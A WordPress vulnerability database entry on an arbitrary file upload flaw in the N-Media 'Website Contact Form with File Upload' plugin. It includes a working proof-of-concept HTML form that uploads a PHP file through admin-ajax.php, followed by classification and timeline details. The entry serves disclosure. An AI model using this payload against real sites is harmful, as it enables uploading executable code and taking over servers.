N-Media Website Contact Form with File Upload - Arbitrary File Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects

Plugin website-contact-form-with-file-upload

References

URL https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claude Godlewski
Submitter Website http://administrateur.ddns.net
Views 232
Verified No
WPVDB ID 8623

Timeline

Publicly Published 2016-09-19 (3 months ago)
Added 2016-09-21 (3 months ago)
Last Updated 2016-09-21 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.